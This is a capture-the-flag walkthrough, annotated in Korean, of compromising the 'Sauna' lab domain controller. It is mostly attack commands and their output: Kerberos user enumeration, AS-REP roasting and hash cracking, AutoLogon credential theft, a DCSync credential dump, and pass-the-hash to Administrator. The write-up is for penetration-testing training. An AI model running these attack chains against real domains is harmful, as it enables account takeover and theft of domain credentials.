Proof of Concept
10.129.3.196
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Sauna]
└─$ nxc smb 10.129.3.196 --generate-hosts-file host
SMB 10.129.3.196 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Sauna]
└─$ cat host
10.129.3.196 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Sauna]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.3.196 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNAInitial Access
80 포트 웹 서비스 /about.html 페이지에서 직원 이름 발견
- Fergus Smith
- Shaun Coins
- Hugo Bear
- Bowie Taylor
- Sophie Driver
- Steven Kerb
사용자 탐색 결과 fsmith가 존재하였으며, 해당 사용자 계정은 “Fergus Smith”의 성 첫 글자와 이름을 합친 것으로 추정 가능
┌──(kali㉿kali)-[~/Sauna]
└─$ ./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.3.196 -d egotistical-bank.local
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/22/26 - Ronnie Flathers @ropnop
2026/02/22 10:27:55 > Using KDC(s):
2026/02/22 10:27:55 > 10.129.3.196:88
2026/02/22 10:28:43 > [+] VALID USERNAME: administrator@egotistical-bank.local
2026/02/22 10:33:07 > [+] VALID USERNAME: hsmith@egotistical-bank.local
2026/02/22 10:33:48 > [+] VALID USERNAME: Administrator@egotistical-bank.local
2026/02/22 10:36:22 > [+] VALID USERNAME: fsmith@egotistical-bank.local
<SNIP>/about.html 에서 확인한 직원들의 이름을 사용하여 사용자 리스트 생성
┌──(kali㉿kali)-[~/Sauna]
└─$ cat userlist.txt
FSmith
SCoins
HBear
BTaylor
SDriver
SKerbAS-REP Roasting을 통해 pre-auth 비활성화 계정 탐색 결과 FSmith 사용자가 비활성화 되어있었으며, 해당 사용자의 해시 획득
┌──(kali㉿kali)-[~/Sauna]
└─$ nxc ldap egotistical-bank.local -u userlist.txt -p '' --asreproast asreproast.hash
LDAP 10.129.3.196 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP 10.129.3.196 389 SAUNA $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e967e82b5400e3d7b11301f8f90c85e0$8e7c58780ccd34d7f48169cfdfd70996f4a27eaf5ff244e05ccf95dd7694bed53879cbe854c81bb4204c4d2b5217156d8dd69235e96d1eb5524456877b19528500f4766268a452b72a02c2d4779dd582d7a3c6ef6179a34620da861426992bca66f8d7889054325b07278740f2d392b20d4420d84cbff1dedefbd2626ac48f9c6f9f3592f2cde518075b61a819c3106d37fd6d0f5eca4585e864679b44b07f2098581b5a9222f5cb2594a5acc2f8d56fd452a282e7c3db71f6846fdf7356781ad82434f514b1430a52027075c32395d5d5719b3b2cf3f72a90473ca543fc0ab575add611bbfd8ed6f95957ec4c2f98cd5da5f1e0be8617db4dcabfb29f47df9b
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)해시 크랙하여 평문 비밀번호 획득
- FSmith:Thestrokes23
┌──(kali㉿kali)-[~/Sauna]
└─$ hashcat -m 18200 asreproast.hash /usr/share/wordlists/rockyou.txt --quiet
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e967e82b5400e3d7b11301f8f90c85e0$8e7c58780ccd34d7f48169cfdfd70996f4a27eaf5ff244e05ccf95dd7694bed53879cbe854c81bb4204c4d2b5217156d8dd69235e96d1eb5524456877b19528500f4766268a452b72a02c2d4779dd582d7a3c6ef6179a34620da861426992bca66f8d7889054325b07278740f2d392b20d4420d84cbff1dedefbd2626ac48f9c6f9f3592f2cde518075b61a819c3106d37fd6d0f5eca4585e864679b44b07f2098581b5a9222f5cb2594a5acc2f8d56fd452a282e7c3db71f6846fdf7356781ad82434f514b1430a52027075c32395d5d5719b3b2cf3f72a90473ca543fc0ab575add611bbfd8ed6f95957ec4c2f98cd5da5f1e0be8617db4dcabfb29f47df9b:Thestrokes23알아낸 FSmith 계정정보로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'FSmith' -p 'Thestrokes23'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
c893caf3c8a65db432d018f5b985423d
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e6
IPv6 Address. . . . . . . . . . . : dead:beef::4d7:86e0:5b6:4ae8
Link-local IPv6 Address . . . . . : fe80::4d7:86e0:5b6:4ae8%7
IPv4 Address. . . . . . . . . . . : 10.129.3.196
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
10.129.0.1Lateral Movement (auth as svc_loanmgr)
WinPeas 열거 결과 AutoLogon credentials 발견
- svc_loanmanager:Moneymakestheworldgoround!
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!발견한 비밀번호를 사용하여 svc_loanmgr 사용자로 WinRM 서비스 인증 성공
┌──(kali㉿kali)-[~/Sauna]
└─$ nxc winrm egotistical-bank.local -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
WINRM 10.129.3.196 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.129.3.196 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)svc_loanmgr 사용자로 WinRM 접속
┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>Privilege Escalation
BloodHound 정보 수집
┌──(kali㉿kali)-[~/Sauna]
└─$ bloodhound-python -d 'egotistical-bank.local' -u 'FSmith' -p 'Thestrokes23' -c All -ns 10.129.3.196 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Testing resolved hostname connectivity dead:beef::4d7:86e0:5b6:4ae8
INFO: Trying LDAP connection to dead:beef::4d7:86e0:5b6:4ae8
INFO: Testing resolved hostname connectivity dead:beef::e6
INFO: Trying LDAP connection to dead:beef::e6
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Testing resolved hostname connectivity dead:beef::4d7:86e0:5b6:4ae8
INFO: Trying LDAP connection to dead:beef::4d7:86e0:5b6:4ae8
INFO: Testing resolved hostname connectivity dead:beef::e6
INFO: Trying LDAP connection to dead:beef::e6
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 48S
INFO: Compressing output into 20260222174552_bloodhound.zipChecked BloodHound and notified the user SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL has the GetChangesAll permission on the domain EGOTISTICAL-BANK.LOCAL.
Impacket-secretsdump를 사용하여 Administrator의 NTLM 해시 획득
- 823452073d75b9d1cf70ebdf86c7f98e
┌──(kali㉿kali)-[~/Sauna]
└─$ impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@egotistical-bank.local'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:dc9e6e68a553b0a9d8d167be35f9165f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:6cd7d15dfcc81bafac4d0e7fb670f30d7ddd897a6cf0b253abe0c0d372e8942c
SAUNA$:aes128-cts-hmac-sha1-96:b8e28d93e15a45d807596dd50a2648cf
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...획득한 NTLM 해시를 사용하여 Administrator 계정으로 WinRM 접속
┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
220be78c4d80686e87f5b0967447405c
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e6
IPv6 Address. . . . . . . . . . . : dead:beef::4d7:86e0:5b6:4ae8
Link-local IPv6 Address . . . . . : fe80::4d7:86e0:5b6:4ae8%7
IPv4 Address. . . . . . . . . . . : 10.129.3.196
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
10.129.0.1